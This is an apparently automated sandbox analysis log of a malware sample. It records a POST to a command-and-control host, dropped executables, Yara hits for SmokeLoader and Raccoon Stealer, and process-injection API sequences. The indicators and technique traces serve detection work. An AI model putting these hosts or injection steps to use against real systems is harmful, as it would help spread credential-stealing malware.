Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115

Posts data to webserver

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdytesri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: hajezey1.top

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Source: Yara match	File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY

Creates a DirectInput object (often for capturing keystrokes)

Source: 21.exe, 00000010.00000002.389134308.0000000002D3A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Source: Yara match	File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

System Summary:

.NET source code contains very large array initializations

Source: BBE1.exe.10.dr, ???????????????.cs	Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Source: D8D0.exe.10.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.cs	Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704

PE file contains section with special chars

Source: F1AC.exe.10.dr

Static PE information: section name: Cgw(O~.

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56AB40		29_2_6B56AB40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B563360		29_2_6B563360
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A309		29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57ABD8		29_2_6B57ABD8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B598BE8		29_2_6B598BE8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F23E3		29_2_6B5F23E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5EEB8A		29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57EBB0		29_2_6B57EBB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FFA2B		29_2_6B5FFA2B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604AEF		29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60E2C5		29_2_6B60E2C5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6132A9		29_2_6B6132A9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B562990		29_2_6B562990
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5699BF		29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B578840		29_2_6B578840
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546800		29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601002		29_2_6B601002
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56A830		29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55B090		29_2_6B55B090
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6067E2		29_2_6B6067E2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5CAE60		29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B566E30		29_2_6B566E30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B612EF7		29_2_6B612EF7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B562D50		29_2_6B562D50
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B611D55		29_2_6B611D55
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B540D20		29_2_6B540D20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5735D0		29_2_6B5735D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B562430		29_2_6B562430
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496		29_2_6B604496

PE file contains strange resources

Source: CAC5.exe.10.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F11E.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F11E.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\explorer.exe

Section loaded: taskschd.dll

Jump to behavior

Uses 32bit PE files

Source: Md0q201V1D.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 39.0.DF3A.exe.ed0000.11.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.2.B096.exe.a00000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\B096.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\DEDC.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\D8D0.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\FD36.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: String function: 6B59D08C appears 40 times
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: String function: 6B54B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: String function: 6B5D5720 appears 76 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_0040185B Sleep,NtTerminateProcess,		3_2_0040185B
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_00401866 Sleep,NtTerminateProcess,		3_2_00401866
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_0040187A Sleep,NtTerminateProcess,		3_2_0040187A
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_0040163B NtMapViewOfSection,		3_2_0040163B
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_004018D3 NtTerminateProcess,		3_2_004018D3
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_00401884 Sleep,NtTerminateProcess,		3_2_00401884
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_00401888 NtTerminateProcess,		3_2_00401888
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_0040156A NtMapViewOfSection,		3_2_0040156A
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection,		3_2_004015DB
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_2_004017EA Sleep,NtTerminateProcess,		3_2_004017EA
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_1_0040156A NtMapViewOfSection,		3_1_0040156A
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection,		3_1_004015DB
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 3_1_0040163B NtMapViewOfSection,		3_1_0040163B
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,		14_2_02BE0110
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_0040185B Sleep,NtTerminateProcess,		19_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_00401866 Sleep,NtTerminateProcess,		19_2_00401866
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_0040187A Sleep,NtTerminateProcess,		19_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_0040163B NtMapViewOfSection,		19_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_004018D3 NtTerminateProcess,		19_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_00401884 Sleep,NtTerminateProcess,		19_2_00401884
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_00401888 NtTerminateProcess,		19_2_00401888
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_0040156A NtMapViewOfSection,		19_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_004015DB NtMapViewOfSection,NtMapViewOfSection,		19_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_2_004017EA Sleep,NtTerminateProcess,		19_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_1_0040156A NtMapViewOfSection,		19_1_0040156A
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_1_004015DB NtMapViewOfSection,NtMapViewOfSection,		19_1_004015DB
Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 19_1_0040163B NtMapViewOfSection,		19_1_0040163B
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 23_2_02CB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,		23_2_02CB0110
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_0040185B Sleep,NtTerminateProcess,		28_2_0040185B
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_00401866 Sleep,NtTerminateProcess,		28_2_00401866
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_0040187A Sleep,NtTerminateProcess,		28_2_0040187A
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_0040163B NtMapViewOfSection,		28_2_0040163B
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_004018D3 NtTerminateProcess,		28_2_004018D3
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_00401884 Sleep,NtTerminateProcess,		28_2_00401884
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_00401888 NtTerminateProcess,		28_2_00401888
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_0040156A NtMapViewOfSection,		28_2_0040156A
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_004015DB NtMapViewOfSection,NtMapViewOfSection,		28_2_004015DB
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 28_2_004017EA Sleep,NtTerminateProcess,		28_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_0040181C Sleep,NtTerminateProcess,		29_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402406 NtEnumerateKey,		29_2_00402406
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00401F25 NtQuerySystemInformation,		29_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00401828 Sleep,NtTerminateProcess,		29_2_00401828
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402431 NtEnumerateKey,		29_2_00402431
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_004017DA Sleep,NtTerminateProcess,		29_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_004017F8 NtTerminateProcess,		29_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_0040209A NtQuerySystemInformation,		29_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_004017A3 Sleep,NtTerminateProcess,		29_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5899A0 ZwCreateSection,LdrInitializeThunk,		29_2_6B5899A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589860 ZwQuerySystemInformation,LdrInitializeThunk,		29_2_6B589860
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589820 ZwEnumerateKey,LdrInitializeThunk,		29_2_6B589820
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5898C0 ZwDuplicateObject,LdrInitializeThunk,		29_2_6B5898C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589780 ZwMapViewOfSection,LdrInitializeThunk,		29_2_6B589780
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58967A NtQueryInformationProcess,LdrInitializeThunk,		29_2_6B58967A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589660 ZwAllocateVirtualMemory,LdrInitializeThunk,		29_2_6B589660
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B589600 ZwOpenKey,LdrInitializeThunk,		29_2_6B589600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B48 ZwClose,ZwClose,		29_2_6B573B48
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AB70 ZwReleaseWorkerFactoryWorker,		29_2_6B58AB70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542B7E ZwSetInformationThread,ZwClose,		29_2_6B542B7E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,		29_2_6B573B7A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,		29_2_6B5D8372
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,		29_2_6B5F6369
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B58AB60 ZwReleaseKeyedEvent,		29_2_6B58AB60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,		29_2_6B5D6365
